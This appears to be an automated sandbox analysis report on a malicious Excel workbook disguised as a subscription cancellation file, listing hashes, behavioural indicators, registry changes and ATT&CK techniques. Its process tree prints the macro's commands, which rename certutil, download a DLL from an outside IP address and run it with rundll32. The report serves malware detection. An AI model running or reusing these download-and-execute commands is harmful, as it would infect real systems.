fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

General

Target

cancel_sub_VCP1234567890123.xlsb
Size

123KB
MD5

9e1ee4a42c381eabcf2cde38a1aae7c9
SHA1

015bb306d9e54001d433b3ac2e7212b864f54ae2
SHA256

fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3
SHA512

d8955c76657c68542ebcd1fc0b14b69917976892a2005ff0fcace3754200d52c4557235e083b76f4115cc940281dbe77a8e390e8bd18fbe9d5cdb128191580ec

Score

10^/10

Malware Config

Extracted

Language

xlm4.0

Source

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	892	332	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	412	332	cmd.exe	EXCEL.EXE

Executes dropped EXE 1 IoCs

Processes:

TTObk2.exe

pid process

1696 TTObk2.exe
Loads dropped DLL 1 IoCs

Processes:

EXCEL.EXE

pid process

332 EXCEL.EXE
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

pid	process
1696	TTObk2.exe

pid	process
332	EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

332 EXCEL.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

332 EXCEL.EXE
332 EXCEL.EXE
332 EXCEL.EXE
332 EXCEL.EXE
332 EXCEL.EXE

pid	process
332	EXCEL.EXE

pid	process
332	EXCEL.EXE
332	EXCEL.EXE
332	EXCEL.EXE
332	EXCEL.EXE
332	EXCEL.EXE

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

EXCEL.EXEcmd.exe

description	pid	process	target process
PID 332 wrote to memory of 892	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 892	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 892	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 892	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 1696	332	EXCEL.EXE	TTObk2.exe
PID 332 wrote to memory of 1696	332	EXCEL.EXE	TTObk2.exe
PID 332 wrote to memory of 1696	332	EXCEL.EXE	TTObk2.exe
PID 332 wrote to memory of 1696	332	EXCEL.EXE	TTObk2.exe
PID 332 wrote to memory of 412	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 412	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 412	332	EXCEL.EXE	cmd.exe
PID 332 wrote to memory of 412	332	EXCEL.EXE	cmd.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe
PID 412 wrote to memory of 2036	412	cmd.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb
1⤵
- Loads dropped DLL
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
2⤵
- Process spawned unexpected child process
PID:892

C:\programdata\TTObk2\TTObk2.exe
"C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
2⤵
- Executes dropped EXE
PID:1696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:412

C:\Windows\SysWOW64\rundll32.exe
rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
3⤵
PID:2036

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\TTObk2\TTObk2.exe
MD5
7b973145f7e1b59330ca4dd1f86b3d55

SHA1
10ce9174bff4856083e6adad0094a798ced2c079

SHA256
589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

SHA512
1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

Download Submit
C:\programdata\TTObk2\TTObk2.exe
MD5
7b973145f7e1b59330ca4dd1f86b3d55

SHA1
10ce9174bff4856083e6adad0094a798ced2c079

SHA256
589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

SHA512
1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

Download Submit
\ProgramData\TTObk2\TTObk2.exe
MD5
7b973145f7e1b59330ca4dd1f86b3d55

SHA1
10ce9174bff4856083e6adad0094a798ced2c079

SHA256
589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4

SHA512
1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

Download Submit
memory/332-59-0x000000002FD71000-0x000000002FD74000-memory.dmp

Filesize
12KB

Download
memory/332-60-0x0000000071211000-0x0000000071213000-memory.dmp

Filesize
8KB

Download
memory/332-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/412-68-0x0000000000000000-mapping.dmp

Download
memory/892-62-0x0000000000000000-mapping.dmp

Download
memory/1696-65-0x0000000000000000-mapping.dmp

Download
memory/1696-67-0x0000000075FF1000-0x0000000075FF3000-memory.dmp

Filesize
8KB

Download
memory/2036-69-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads